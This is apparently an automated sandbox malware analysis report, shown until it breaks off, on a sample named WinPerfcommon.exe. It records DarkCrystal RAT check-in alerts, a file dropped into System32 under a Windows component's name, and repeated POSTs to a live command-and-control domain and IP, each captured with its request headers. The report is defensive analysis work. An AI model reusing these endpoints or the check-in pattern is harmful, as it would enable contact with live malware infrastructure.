Source: WinPerfcommon.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb; source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA6B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bN.PDB; source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1850754323.000000001BA22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.pdb; source: WinPerfcommon.exe, 00000000.00000002.1747143226.00000000031DD000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe; File opened: C:\Users\user
Source: C:\Users\user\Desktop\WinPerfcommon.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\WinPerfcommon.exe; File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\WinPerfcommon.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\WinPerfcommon.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\WinPerfcommon.exe; File opened: C:\Users\user\AppData\Local

                              Networking

                              barindex
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62175 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62196 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62218 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62254 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62450 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62452 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62448 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62270 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62453 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62451 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62295 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62410 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62449 -> 37.44.238.250:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:62447 -> 37.44.238.250:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: global traffic | TCP traffic: 192.168.2.4:62172 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 37.44.238.250
Source: Joe Sandbox View | ASN Name: HARMONYHOSTING-ASFR
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: fsin.top
Source: unknown | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: fsin.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:20:13 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:20:26 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:20:52 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:21:01 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:21:05 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:21:11 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:21:13 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:21:17 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:21:38 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:22:05 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:22:14 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:22:17 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:22:23 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not 